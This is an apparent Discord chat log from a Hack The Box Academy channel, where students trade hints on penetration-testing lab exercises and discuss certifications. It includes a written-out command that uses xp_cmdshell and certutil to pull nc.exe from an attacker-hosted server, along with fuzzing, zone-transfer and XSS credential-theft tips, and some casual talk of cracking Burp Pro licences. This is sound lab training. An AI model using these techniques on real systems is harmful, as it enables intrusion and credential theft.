#modules

yeh even worse is when they turn issues off altogether! even if devs dont have time to fix, other users can post their troubleshooting steps/fixes if they leave them open 😫

i think because the academy is paid content, only the tier 0 modules are allowed public walkthroughs

Hi I am doing footprinting hard lab, figured out that snmp server is v3 but cannot find commmunity string..used onesixtyone with snmp seclist but nothing only got ,,linux nixhard 5.4.0_90 generic #101 ubuntu smp but no community string...and I could also interact with imap and pop3 servers but not sure what commands shall I use on Imap..or am I on a wrong track? Donnot know from where can I get the rsa for ssh...

yeah module writeups would be pretty anti-thetical to the purpose of the modules

not like challenge boxes where a writeup might teach you about a new technique or attack. The module already does that, you just have to apply it.

Is this the right place to post questions about module exercises?

I'm super stuck.

I mean looks like ya got it to me

It asks for the version for service running on 8080. Looks like Apache Tomcat/9.0.31 is running on 8080 but it says that 9.0.31, 9, 9.0, Apache Tomcat, etc are all wrong

same. that's why I'm so confused

which module/section are you on? I'll review it real quick

Youre awesome. Getting Started - Service Scanning

ah gotcha, yeah the Apache Tomcat youve tried is correct. If you copy pasted make sure you didnt accidentally include and extra space somewhere

9.0.31 gives me an error...

well thats not the one I said was correct so lol

rekt. Thanks for confirming I'm not crazy. Must just be a bug on their end.

99/100 times its just an errant space from copy paste

its a strict text matching 🙂

Well I got the student membership sometimes I get stuck but don't have the time to try every method and option

Or I find out that I had the answer the whole time I just wasn't pasting the whole thing

Dont take me the wrong way here, but thats a very poor way to approach the material

It isn't if you study

itll bite you in the foot come skill assessment or exam time

The whole point is to learn how to use the tool

So that I can start using it an real engagements

That's what I've been doing

not really, the CPTS is focused on TTPs

Okay then what should I do

but lets say your way is right, copy pasting things isnt really learning the tools either

If studying and applying the material in real scenarios isn't enough

Wdym copy pasting?

Im just quoting what youve said my friend

I mean once you get a flag

Sometimes I don't copy the whole flag

ah gotcha

thats very different than what your comment originally sounded like lol

Yeah I get that a lot

I have a hard time conveying what I say

wdym by not having the time to try every method and option then? before I criticize that specifically and you actually meant something else

No I think you understand what I mean by that

I try quite a few different methods

And then I try what the module is asking in the directions

I get stuck

And look it up

Well

I try to look up guides on how to use x tool first

Then I start looking for write ups

ah well, part of the whole cpts and teaching TTPs is comprehensive approaches. Enumeration is key in the real world and it applies here too. You should be trying everything because in the real world your job may literally be trying everything. Red teams can be a little different, but standard pentests want a comprehensive approach. They dont want to know just thr one way you got initial access, they want to know the myriad ways of getting initial access for example.

Yeah I definitely agree with you but I usually just have so many other factors I'm dealing with

I prefer this kind of self education

But

its a demanding field

I'm also taking 16 credit hours

Along with a part time job

I just feel like I'm wasting my time when I look at

Estimated time:45 min and I've spent like

2 hours on it

It's discouraging I guess

I feel it, but its not something you can shortcut and do well on later

dont worry about the time estimates, theyre all bullshit

the 41 days or so overall estimate btw is assuming 1 day = 8 hours of active work for each day

the first dude who passed the exam already had half the modules done cause of the CBBH and had full time security job and still took 49 days to complete the rest.

Ive had days where I blitzed 3 modules in one day, and then 2 weeks on a module that says 2 days.

Damn okay that's a bit relieving lol

I literally do not look at the time estimates at all

Alright I appreciate the advice man I'm gonna go back to htb and try my best

good luck

I made it a lot farther on tryhackme

Only cause they have a write up for every activity

remember the golden rule: HTB easy is THM medium/hard

I think you got that backwards

this platform is just objectively more advanced in difficulty than THM

I breeze through thm

Yes thats what Im saying

Okay

"easy" ranked HTB content is more equivalent to medium or hard ranked THM content and it only goes up from there

and cpts is a whole mix of easy and medium modules

Sorry had to do something @thorn urchin

Do you have any suggestions advice on where to start in Red Teaming

On htb

I mean the cpts itself is a good start. Theres also the pro labs that are whole simulated networks so theyre really good. Dante in particular gets heavily recommended as extracurricular exam prep after youre done with the modules.

Difficulty with red teaming specifically is that theres a slight shift of general approaches and goals compared to regular pentesting, and so a lot of educational content is ill suited for it. A lot more of like C2 domain name preps, EDR evasions, phishing, state of the art attacks like ADCS attacks.

Dante yeah me and a buddy were planning on doing an engagement on dante

id focus more on nailing general pentesting stuff before worrying about red team content. There is no real jr red teamer that isnt already senior pentester basically lol

Ah alright idk I've just heard a lot from friends in the field

You don't know who has the best advice on all that but I agree

no worries mostly Im parroting what Ive heard as well

I think I should study more tools in pentesting before attacking ADs

CPTS modules have a couple excellent ones dedicated to AD anyways

the Active Directory Enumeration and Attacks module is a mammoth, expect to spend a lot of time on that one

30+ sections lol

Dumb question but what are CPTS

its the HTB certification

Sorry if I'm talking your ear off man

Oh okay

if youre doing modules youre typically on either the CPTS or the CBBH paths for their certs

CPTS is meant as a competitor to the OSCP

Thanks for all the advice man I didn't know that I'm definitely gonna try pursuing that as my self education goal now

I wanted to take the oscp down the road

But if I can start studying it now that'll definitely help a ton

np, typically in this channel the assumption is that youre going for one of those two

The cbbh path is bug bounty I'm guessing?

yeah, greater focus on web app pentesting stuff

Is there a equivalent of that cert?

Like the oscp

Web app pentesting sounds like a nightmare to me

I think portswigger has some certs that are comparable or even more in depth(theyre the burpsuite guys afterall). Other than that the only ones that come to mind are pretty minor stuff

offsec do OSWE as well

but yeh portswiggers web security academy is amazing

and they have a cert for it now

oh yea their cer is going to be $9 on black friday so i'm definitely going to do that cer in a few months

they were doing it for free when they released it

problem is you need burp pro

so its not really free 😄

does burp pro still have lifetime licenses?

nah like $400 a year i think

last i checked

cause tbh if youre gunna get serious about web app stuff, its really not a bad pickup

ah yeah oof

God mother fuckin damn

400

How much was a lifetime license when they were around lol

nope it's $449

I mean the price is still worth it if youre super serious, its pretty clearly the most powerful web app testing tool around

has anyone done hashcat module?

yeh if you doing bug bounty or web app pentesting professionally youd be silly not to get it

I know they used to be pretty chill about cracking it on the basis that if you had the skills to do so youve earned it, but I doubt they still have that unofficial policy anymore.

or maybe Im thinking of ida, memory could be fuzzy

How do you know if pentesting/red teaming or web app pentesting and that is for you

¯_(ツ)_/¯

passion

True

Hmm I wonder

I don't think trying ro learn both is practical

Everything else Ive been doing in life just doesnt feel as fulfilling and feels like I'm wasting my time

Learning both IS pretty practical, but specialization helps a lot

@lament tartan can u help me with last question?

yeh whats the quesiton

the assessment?

last question asks for the password i get 5 times, the problem is i got more than one five times and i've been stuck there for a week lmao

oh sorry i havent done the module 😂

thought you meant hashcat section of the CPTS track

RIP

na

np 🙂 thanks anyway

if you shot me a giftcard for the cubes id take a look at it and help out in a couple of days 😂

jk dont do that

@sly reef so the skill assessment? (i finishe that module btw)

yep

what did you do?

i've tried everything in last question

after cracking the hash did you use the DPAT tool?

nope

yea... use that

i cracked 60% of the hashes in the file

and counted them

@lament tartan hei, how do u transfer a directory to the attacked machine because scp is not working

oh you don't need to crack them all

what do i crack then

it is asking for the most common password

:/

the given NTDS.zip file? you can just ues wget

i normally use wget or smb

oh you can get the most common password without cracking 100% of the hash i think i didn't even come close to 60%

can u tell me which one you got? Idk what i am doing wrong

i've been trying for a week now

lol

also i'm not 100% sure about this but i think they did add some uncrackable hash to make this realistic

use the DPAT tool (with your hashcat.potfile)

@lament tartan @vital adder thanks

oh rdp as well, if you can enable it then just copy and paste the dir

if youre a renegade that doesnt care about opsec, xfreerdp has the +home-drive option that will mount your home dir for easy file transfer as well.

i think it depend on if you can crack a tool like burp, if you can then i think you're earned it but if you just download other people crack then 100% not also i think STÖK did talk about some of the crack (but i got brain damage from htb so not 100%)

oh nice i think this did get cover in the file transfer module or something

oh definitely. Ive looked at the jar file before out of curiosity but conveniently the license key sections dont decompile properly with the public decompile tools, which definitely makes it non trivial too 🙂

theres binary versions as well Ive not examined at all

its one of the reasons that I know people who say reversing java is easy you just decompile it have never tried reversing anything other than a trivial java jar

Got it. Where can i suggest a correction for the module? #858470491676737536 ?

thanks btw

Hi there guys having some trouble on Attacking Web Applications with FFUF

Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?

I'm using the command:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://178.62.84.158:30146/ -H 'Host: FUZZ.academy.htb' -fs 900

It detects everything 😦

your fail condition is probably faulty then

+1 this

see what result you get back with just the academy.htb and one with like a bogusobviouslynotreal.academy.htb and see if you can spot a difference in their response and use that

yeh filtering response size 900 there, if the response sizes vary then you can filter by response code or regex

the regex option often doesnt work for me on academy though, even when i can see the text in the response

Yea, just followed what madf0x suggested and it worked, i'm going to try the other filters Crypto, and see how it pans out

Do paid tools like Burpsuite Pro have these kind of functionalities ?

an auto calculate fail condition would be a cool feature to add to ffuff(assuming it doesnt have one already built in somewhere deep down)

yeh burp free does as well, its just severely throttled 😄

also gobuster, idr if it auto-detects or not for vhosts though

yeh you can use --exclude-length option also with gobuster

Someone got a tipp for the easy lab on password attacks? i got the ftp login and im now logged in as mike in ssh but i dont find anything of interest on the system

@zealous belfry use ls -la maybe u may see something interesting

already did but did not see anything there

think of the basics first. What has that user done recently 🙂

ya okay got it well i found that earlier but it didnt came to mind to just use the pw for ssh login

¯_(ツ)_/¯

dont worry, my notes has me embarrassed on that one that I overlooked it until linpeas pointed it out

damn 😄

Is anyone else having trouble spawning targets?

hello, good day...someone has made the web applications module...because the answers of the mini-exercises are not clear to me which url I have to do the tests

gunna need to mention the specific module and section name to get help, lots of web app modules

which question youre on will be ideal as well

Hello. I am stuck with XSS Phishing...i found the payload and it works, but i don t understand how to get the username and password of the victim. Please someone can helps me?

Ive not done that module yet but my first guess would be to check if theres any cookies or form fields that may store that info and exfil those with your payload

Anyone else having issues with interacting with machines?

do you know where i can find a walkthroughts for this module?

Usually walkthroughs are frowned upon if not banned for modules

the module IS the walkthrough, where the skills assessment is you applying what has been taught

might get better help after someone whose gone through that module gets online

Sent ya dm

no thanks

@thorn urchin Did the pivoting module give you any trouble? Yesterday I couldn't get meterpreter to connect at all. Today it seems like I can't even reach the vm on both pwn box and my machine.

nope

someone else said they were having issues with machines earlier so something may be funk

I havnt had a chance today to spin up and modules to see

Werid, when it was working yesterday I couldnt get metasploit to open a socks server either

kept opening and closing

that module overall was kinda funky, but I didnt have those kinds of issues

also ngl, I cheated like half that module using more chisel n stuff than some of the more imo silly stuff.

Why
It’s about the previous module we talked about

oh shoulda lead with that lol

Lol well the hashcat takes longer than expected

Welcome to cracking hashes

Lol😢

Would be super sick to get a hash cracking rig

i learn this on tryhackme throwback lab a while back but there is something call colabcat that's basically cracking hash using hashcat on google colab but now i think that's against google colab TOS but the tool is still there and you can still use it

@thorn urchin Yeah its crashing on me constantly for what ever reason

guess im going take a break tonight

there ain't no rest for the wicked

Can I text anyone regarding WebAttack Skill assesment

What’s also really cool are automated hash-cracking methodologies.

Makes life so much easier

A hint for the medium pw cracking lab? Logged in as ||john|| already and got the docx file open but i dont find || any databases, scripts, or ways to get root or the user dennis||

i am stuck in the section xss phishing...The exercise ask this: Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag. I found the payload but i don t understand to who i must send the url to get his username and password

||there is a simulated user that will submit the form if you sent the correct payload||

aaaah so the payload is wrong good

Read the question more carefully :).I'm sure you can find the answer

Hi everyone! I was wondering if anyone could provide a nudge about the cleartext credentials for bob_adm in the windows privilege escalation module

get a nudge on this

What is the ObjectAceType of the first right that the forend user has over the GPO Management group?

i have ran everything in powershell and bloodhound. Powershell just hangs up and I don't get anything back.

its not hanging, it just takes a REALLY long time to finish

and unfortunately I don't believe bloodhound records the answer in the format the question wants, I couldnt find a way to get what it wanted anyways

Password Attacks Module: I have am stuck when I try to install Crackmapexec (I'm on Network Services) I had tried both install it with Apt install and PIP / PIP3 install and I have no clue what I have to do (see my screenshot)

why you trying to pip install it

use apt on kali

see if you have the libs installed apt-get install -y libssl-dev libffi-dev python-dev-is-python3 build-essential

I hse Parrot Sec OS
After I run your commands and try run crackmapexec smb -h I get this Error message

im not sure if you can use apt on parrot then. Apt and crackmap is as far as i know is kali only

https://wiki.porchetta.industries/getting-started/installation/installation-on-unix take a look at installing from source probably thats going to work for you

if youre using the pwnbox it should be already installed, you can also try pipx install crackmapexec

yup thats also on the page furhter down if you like python more

cme is written in python, you dont have a choice in the matter 😂

just whether apt is handling the package or pip

you can also use poetry

I get same error on Pwnbox

if you are running the command as shown then thats wrong

pwnbox calls crackmapexec cme

@thorn urchin I sent you a DM if you don’t mind

when I run crackmapexec smb -h I get same error on Pwnbox

bout leaving from work, be awhile before I respond

in pwnboxsudo cme smb --help

like I said, its preinstalled as cme

okey I try it then

if that doesnt work something may have broke when you tried installing it so reset the instance and then try cme

When I try use sudo cme winrm on Pwnbox I get this Errormessage

am I the only one who likes nano more than vim

I agree nano is very nice to use, but vi is more common a server have installed by default

You actually just sovled a problem for me and you didn't mean it haha

When I try use sudo cme winrm on Pwnbox I get this Errormessage. Anyone have any idea or hint ?

That is a warning message about blowfish being deprecated. Warnings aren't as severe as errors and we frequently ignore them.

@zealous belfry @thorn urchin I solved it! Thanks for your help 🙏

@sharp cove @languid dawn

Thanks for the heads up!

Good evening / morning

No

google is your best bet

is anyone up for a challenge?

hello, i have windows 11 pc and 4 random preson google profiles, all be hacked in two days

strong passwords, now i set f2a, but think something is my pc

a have some cracked software

adaware free scan says all ok

but i wanna format system disk a clean windows install withou any cracks

Hi did you have any luck with this? in the same boat....... sorted

last software what i istall was wiztree

free version

@onyx copper were not tech support, good luck

Can someone help on attacking common services - skill assessment easy. I found the username from SMTP and tried to brute-force it with various services, but I found nothing.

@orchid ingot anonymous login on ftp may help

new info google spoted my pc as malware and logout all 4 person from pc

on another devices acounts works normal

i remove addblocker from chrome extensions

Hello guys if someone have attaque the squashed machine in hackthebox i need a help

I can t decrypt the keepass file

With an extention .kdbx

hello

Hey

hi

Any advice for getting started on CTF? Any good books? Im stuck and i dont have knowledge to find some flags.

Hack the box academy will be the best place

depends abit on what you know but they ahve a great lead up for it

HTB Acadamy, i just rooted my first box through it

Nice job live one?

Its such an awesome feeling

nibble box

its though the getting started module

but its a live machine too i think

#welcome

Okay, so have run into a problem. I currently use/have used kali for a while and I'm getting 100% different responses with a dig command.
I've just fully updated kali, and I am still getting "communication error / timeout" when attempting to solve a problem in active subdomain enumeration.

example just for reference:

1. Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
   Kali: ||dig ns inlanefreight.htb @<ip>||
   Response: communication error to <ip>#53: timed out

Parrot: ||dig ns inlanefreight.htb @<ip>||
Response: ```; <<>> DiG 9.16.27-Debian <<>> ns inlanefreight.htb @10.129.42.195
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3105
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: b2dec93a1964fb15010000006378bc6492c78e95d88c46c8 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN NS

;; ANSWER SECTION:
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.

;; ADDITIONAL SECTION:
ns.inlanefreight.htb. 604800 IN A 127.0.0.1

;; Query time: 83 msec
;; SERVER: 10.129.42.195#53(10.129.42.195)
;; WHEN: Sat Nov 19 11:22:12 GMT 2022
;; MSG SIZE rcvd: 107```

I have full disconnected/ reconnected my VPN when testing and I'm really unsure why in Kali I cannot get the same response or what I might have messed up. Would love some help / clarification before future problems arise regarding the same thing.

Hi, maybe weird question but are their pdf extracts of the text we can download to print? I am a terrible learner on screen and for example all the AD knowledge is just not getting in my mind by reading it on screen (can't doodle/note next to it as to speak)

Hello I have 2 questions for active directory. I try with kerbrute jsmith.txt password list how can i save the result easily. Why on crackmapexec and kerbrute they stop enumeration when they get 1 valid users ?

HI

Hace you tried downloading a new vpn file ? And change the protocol to connect?

You can maybe try connecting to another region

I havent ill give that a go

Let me try

Does PTS cover ADCS abuse?

(asking for a friend)

CPTS*

Works for me

Did you try spawning the ip?

Installing new kali box atm i walked aaway for a bit so trying it now

On the Pivoting Module is anyone else unable to get a socks server running via metasploit? I've tried now on both my Kali Box & Pwnbox and I get the same thing

Shouldn’t you set your SRVHOST to local?

in the module page they show 0.0.0.0

let me try that real quick

Nope tried localhost and 127.0.0.1 as well as swapping to version 5 (and editing proxuchains.conf)

BYE

I mean the ip of the machine from where you are listening

Do you mean the one facing me or the pivot target ?

Facing you

In the end the server will be listening

So the ip of that server has to be you

Is like nc -l

Similar not the same

still fails

Strange

That is the local ip from where you listen right?

ah ha I figured it out

has to be the ip of the pwnbox machine

Right

The one you are using

Your machine

im guessing using 127.0.0.0 would fail on my kali because it has to route via the tunnel

May have not enough clearly explained myself

Try your tun0

but the pwnbox does not and 127 should work, either way every tutorial I can find seems to have it pointing to 0.0.0.0

goddamn inside job is good

@pastel ginkgo shoot me a dm if you still need help with that i'll help you troubleshoot

Thanks! I got it working on Pwnbox so now im going to try on my Kali box

Hey @vital adder can I dm you real quick?

sure

I'm experiencing the same thing. I'm on the guest Parrot OS and I've double checked that the syntax is fine and that the ip is spawned

Yea i reinstalled kali

works perfectly on Parrot OS but not working at all on kali 😦

Have fully reinstalled / updated/ moved to vmware workstation 17 as well just no go for all of it:(

Yeah I reset the workstation and refreshed the ip a few times and nothing

what is this

Active subdomain enumeration might actually be the death of me. I cant be this stupid to not understand and struggle on every question....anyways

1.Find and submit the contents of the TXT record as the answer.

so I used ||dig axfr inlanefreight.htb @<ip>|| to basically enumerate all the subdomains. From here it seems that I should be able to use something like dig txt <subdomain>.inlanefreight.htb @<ip shown from subdomain enumeration>

I cant figure out waht i'm doing wrong i've gone through every single one in this manner and am not getting a TXT response from any of these.

@low vine try on internal maybe

I guess I missed that

So its not the ip thats shown from the transfer?

Example the IP i have for HTBA is 10.129.xx.xxx

The enumeration shows ips next to the subdomains of <10.10.34.2>

@low vine no

My mental is dying in this section lol this seems so fucking easy and I'm having such a hard time lol

need to spend a bunch of time here lol

Okay other question, question before its talking about zones and identifying the number of zones we have. I basically saw that there is an "A" record and a "NS" record does that mean its only 2 zones or is my understanding wrong

Hi guys, having some trouble with Parameter Fuzzing - GET section on ATTACKING WEB APPLICATIONS WITH FFUF module.

I'm not sure i'm doing this wrong, but i added the IP 178.62.84.158 and admin.hackthebox.htb to the /etc/hosts/ and i'm trying to run the command

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.178.62.84.158:30633/admin/admin.php?FUZZ=key -fs 341 yet it doesn't return any results

Should i add the 178.62.84.158 and academy.htb since admin is a VHOST?

Got it, needed to add the following input to /etc/hosts: SpawnMachine academy.htb admin.academy.htb

@low vine u will need to count all zones

Okay thanks for clarification, I got it right but wasnt confident that I actually knew how to correctly do that

Hello there, i really stuck with a problem...

Module: PasswordAttacks -> Default Passwords

I know I have to use to Default Cred link provided, but im not sure how to scan using hydra.
The Port i try to Bruteforce is on localhost, so I can't attack this service using its 10.129 IP.

I tried using ssh Dynamic Port Forwarding with Proxychains, but hydra stops after 1sec because of connection error (But nmap works...)

How to brute force this localhost service ?

@rustic sage u don't need to brute force defualt password

now im totaly lost xD any hints ?

Struggling hard on last question for All of the "A" records from all zones.

is there a way to recursively output everything?

or just manually go find it all

@low vine do zone transfer on inlanefreight and internal inlanefreight.htb and count all A

Yup it's what I did was more asking if there was a way to set up something to run some transfers from everything

And output it

Wasn't sure if I was just missing something

@low vine it is hard to do that since i think u can not do zone transfer on sub domains with bash scripting

Wow im rising to new levels of stupidity

Im doing the command injection assesment

Busy with it all day

Try to succesfully inject whoami with different techs

But got error unable to move www-data

So i thougt fuck what al i doing wrong

Spend 2 hours

Untill i realised

…

Www-data

Tunnelvision can make you blind

Yeey another module completed

Hello

Can you help me in module Active Directory

Skills Assessments 2 I stuck at the 4 question

Ik still working on that

I am at NTLM auth

hey all, new module posted today.

Nice

Need more cubes

Cool

Hi all

Hi

It feels good to see my red ball shrink

More brainstuff to consume

On the Active Directory Enumeration & Attacks module Kerberoasting -from linux Section, was the password to use for impacket??? Trying to use GetUserSPNS

Not the example user

Hi everyone

I don't know what you mean by this

Choose an user you have already used in the module

Hey guys evening

Spending my saturday evening on htb

Nice

r u ok bro?

@raven cairn for this module its highly recommended to keep a seperate list of all credentials youve found while progressing through the sections, because they come up again a painful number of times and the module wont always remind you.

I use password spray with user list and password basic list but none results

hi all, im on the footprinting medium lab and a little stuck ive tried everything (i think) so far on each port but unable to get much further just need a bit of a prod into the right direction... i believe i need to mount? right done that bit. lol

sure dm me.

i have a question to the modul local file inclusion..in the section automated scanning they use this command:
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287

this does not give the same output as explained in the modul... when i go to the page there is no button to select language...buit there should be one... otherwise for me it makes totaly sense that the curl command does not work as explained...

there should be the possibility to select the language..no?

Well try look for the parameters name

If it is not language

Try first fuzzing for a parameter bro

Reading bro

Read before ask

lol

be quiet bro

😉

😉

Parameter=argument

Like not in definition

Index.php?parameter=argument

Hi all, Footprinting medium lab. Ive done the NFS but cant open the Dir ive made. permission denied. on tree says [error opening dir] what could be the reason?

you don't understand my question

uff...i am not sure if i can remeber right.... you looged in via rdp with the credentials? Try to login as admin via right clik might help..but it is a time since i've done this...otherwise dm me...

I havent yet found the creds...

ah...

I believe I'm meant to get them from this Directory ive made but since mounting and that I can no longer access this dir

so i cant view the information inside and unsure how to change it

||su root||

password? xD lol

remember the whole big issue with NFS is that it respects your local machines perms

on pwnbox theres a credentials file on the desktop, or you can always sudo su

i never knew that

ill have a look now thanks

ok that worked thank you

You are saying that you cannot find a language button. That is because it is not there

They want you to find a exposed parameter

So fuzz the parameter and filter on the right filesize

I try to help

For the Proxychains module did anyone get Rpiviot to work? I just used sshuttle for the last question because it was ... wayyyyyy easier

i apreciate it. will do it

Damn cannot complete more then 2 section of introduction to ad per day

A lot of text

Hello and help lol. Im stuck at "Firewall and IDS/IPS Evasion - Medium Lab"

the question goes like this ```Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: 10.129.130.173

Time Left: 46 minutes

• 1 After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. ```

i tried everything yet have nothing

most likely i was stuck at the easy lab too. but with some help i got it but 2nd one is deadly idk what to do tbh 2 days or so stuck here

What is the standard protocol that DNS uses?

@acoustic owl can i pick your brains with SQL database locating a user?

sure

@gaunt juniper check the DNS Proxying section in the “Firewall and IDS/IPS Evasion” topic

how? lmfao

footprinting medium lab

im right up to the last part now

and no idea how to locate the user/pass

Do you have access to the database?

yup

so im looking for the htb user and pass now

@rustic sage what do you get when you do select name from sys.databases

keeps crashing too which is annoying

then you only have to query the table in the database.

||SELECT * FROM table WHERE username=‚HTB‘ ||

ok doke... ill see what i can do cheers peoples

solved it cheers

i did, tried everything comands read about 4 times

lol

@gaunt juniper I think this one I got it by luck. It wasn’t working and I just did a normal nmap -p- with a —min-rate 5000 and it worked. But I don’t think it was supposed to work

Which protocol are you trying?

Anyone around for a question on the medium lab for the footprinting module?

I've found credentials from ||nfs port, for what should be rdp, but the xfreerdp keeps returning the following error||

Any help on connecting to rdp would be greatly appreciated

Put the password in quotes to keep bash happy and hide the screenshot with the credentials to avoid spoilers

+clipboard in the xfreerdp command is also helpful

hi

Does anyone have an idea on how to check what commands an user can run as root

I'm doing the Linux PrivEsc module

I've tried doing sudo -l and then submitting the command that says (root) NOPASSWD: /usr/bin/******* and various variations of that command like sudo (command) as the answer

Anybody got an idea of what might be the problem

||try the /usr/bin/** again and make sure you have no extra characters or anything||

thank you

yw

Hey guys, I'm learning in the HTBA, im wondering if I need to use parrot or is it ok to use Kali? Appreciate the advice, my goal is to get the pentester cert in the coming year so not sure if the OS will matter

kali is fine to use

@balmy radish Ty sir

You'll need to connect to the VPN for the non-docker exercises if you aren't using the ParrotOS pwnbox

yw

Ok sure, I think I had been planning to connect to the VPN most of the time moving forward as I feel more comfortable working in my VM instead of pwnbox.

@balmy radish Im working through the setting up module, and they have a recommended tool list file, is this just an example of what we should have or should we actually have all these tools in the file? As I see a step to update all tools in a certain file

Hopefully that makes sense 😵‍💫 haha

You can always install the tools as you need them. I mostly use the pwnbox.

Roger

You have finish AD Stills Assessments part 2 ?

Okok im stuck at the 4 question but we can see together if i finish it or come in dm

hey can I reset the progress of the module? I have one that I've started long ago and want to jump with fresh state

Hey, I'm stuck on the deserialization - Skill Assessment I. I guess I'm stucked with the last exception to escape for my payload, someone can help me ?

Yes if you click on a module (you've already completed), you'll see a button for Retake Module.

and if i didn complete? I have it like halfway through

didnt see such option

I don’t think there is a way unless you see that “Retake Module” button.

Hi, I have some problem with Blind Data Exfiltration from Web Attacks module

I could not get any response from the server

Thanks for the tip, giving that a go!

Cancel my message im gonna just try to re-read all my notes n stuff.

help me Find a way to start a simple HTTP server inside the PWNBOX or your local virtual machine using NPM. Send a command that launches a web server on port 8080 (use a short argument to specify the port number).

What have you tried? Have you tried the man pages? Have you tried looking up how to do so on a search engine?

I wrote teams. but alas does not miss

I recommended for them to use a search engine already.

You don't learn anything if we just give you the answer... Try doing some research and we can nudge you in the right direction if you still need help

Im gonna put my ego aside actually for this - seems people have had issues in the past

Its a badly worded question tbh

I dont think it is unreasonable to find this question confusing if you are a beginner

Can I have a hint for Privilege Escalation - Flag 2

I'll give some context, one moment

I think I was answering your question before you deleted it.

I usually really hate asking for help but

I think I really need to just kind of accept it, I don't think im the only one struggling being new to it

I don't know the specific module, but have you looked for any interesting files? Are there any SUID, GUID, capabilities? See if you're apart of any interesting groups

It's okay to struggle just never give up😉

Also take a break when you get flustered : )

Im too stubborn for that aha-

I haven't been giving up- ill check for files

I think I found passwd earlier but it's just nonsense, nothing to decode

I haven't done the privilege escalation modules yet so I can't really be of much help besides telling you what to look for🤷‍♂️ I just started the CPTS path, but it'll be a while before I get there

This is "Getting Started" ^^;;;

ahh okay I went ahead and figured out the answer

What?!?!

That quick?!...damn ;-;

so there is something you're missing I'm trying to think of how I can word it where it won't give it away

I'm going to dm you in case so there is no spoiler

@rustic sage what is the problem

okieokei!

It's privilege elevation, im stuck in a loop of not being able to do anything with user2, I've found the file but keep getting asked for a password and can't find anything important, and the SSH keys are going over my head (I think)

Check your DMs @rustic sage

Hey has anyone gone through the file transfer module?

Just started … I see I need a bit more familiar with powershell

Guess bash too right?
Any advices?
Thx!

Bought 1800 cubes🤣

Im sponsoring htb like a mowf*cker

Linux or windows?

I already help them they should be good now👍

Okii

now I have to figure out keys

Hello everyone, in AD skills 2 Q7. I tried this:

SQL> xp_cmdshell powershell.exe certutil.exe -urlcache -split -f http://10.129.8.49:8000/nc.exe C:\Users\Public\Downloads\nc.exe
output

But: CertUtil: -URLCache command FAILED: 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)

How can i do ?

I supposed its a restriction error ?

Hey, I'm stuck on the deserialization - Skill Assessment II. I dont really know what i am doing wrong, someone can help me ?

Hey guys wat is nmap -D rnd:x for?

from my understanding it just creates extra

ip addresses

that send the same packet you do

to create some anon

for you

can somerone teach me how to type

https://tenor.com/view/cheezburger-chezburger-cat-sniff-fisheye-gif-26112854

I got a gift card and redeemed it. But i cant spend it even though my account balance would cover a silver subscrbtion. How can I spend it? xD

@bleak heart buy silver subscribtion

"You need to add a payment method to purchase cubes. " but I dont have paypal or a credit card and therefore can't add any other payment method than the gift card. If I click to subscribe I'm asked to enter my credit card info. Do I miss something or is it not possible to buy anything from the account balance if you dont have any payment method added?

and I cant enter the gift card code during checkout because I already redeemed it (the money is stuck in the account balance) 😦

@bleak heart if u cannot buy silver without credit card that is hard maybe u will need to pay cubes only with that gift card

its a little more ecconomical to get the platinum plan for like 2 months then downgrade to silver or student get more cubes for less that way,

Heyo i need some help with last flag of the deserialization attack module, if someone can help pls DM me

May I have some help with Reverse Shell & Payloads - The Live Engagement? I’m receiving an exploit failed message when attempting to run the exploit for the blog site.

Make sure to check the IP address you are using before launching the exploit.

Thank you for the feedback @unique valve 🙂 I have confirmed I am utilizing the correct ip address of the blog site. It is a “NoMethodError undefined method ‘split’ for nil:NilClass” message.

Also confirm that you are using the correct LHOST address. Keep in mind that in this assessment you are connecting to an additional internal network.

Once I get past Information Security Foundations, I was thinking of doing bug bounty pathway before doing CPTS. Is that a bad way to go or should I do CPTS first? I’m a student who wants to bug hunt but I also want to be a pentester someday.

I started the InfoSec fundamentals path to get prerequisites to do either

Anyone else encounter this error when trying to do the chisel section of the Pivoting module?

@rustic sage Did you figure it out?

No

Yes but i relaunched my kali and try in the parrot and it resolve it idont know how

can you help me

hi, please when start the competition of Hack the Box ?

There is no LHOST option for this exploit and just an LPORT. I also changed the LPORT to a verified open port on the box but that didn’t help either.

Werid I got it to work when I built chisel on their machine and put it on the ubuntu server and it then played nicely with both my kali machine and theirs

yes maybe a bug ?

yeah Im thinking something just wasnt playing nice with my kali box. I've noticed theres a few bugs with this module

Yeah i remember i have changed few times kali and parrot for this module and it solve big

bug

Some box work better with kali and some box with parrot

how did you solved it?

Hey guys im trying the Passwords Attack Module from the Junior Path, and I dont understand this question.
Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
The module provides a list of both usernames and credentials as Resources, but when i try to use them, im unable to do a sucessful brute-force. Is there anything that Im missing? Is there a way to get the user whitout having to brute-force both user and password?

Did you have issues with the Windows RDP tunneling? I try and load the dll and it returns an error code. || I already disabled AV ||

@pastel ginkgo are u on pivoting module

Yeah the last part before the assement

@pastel ginkgo have u done rpivot section

I couldnt get rpviot to work

I ended up solving it using sshuttle

@pastel ginkgo I have failed to transfer rpivot directory so i have not solved it maybe i will try to use sshuttle

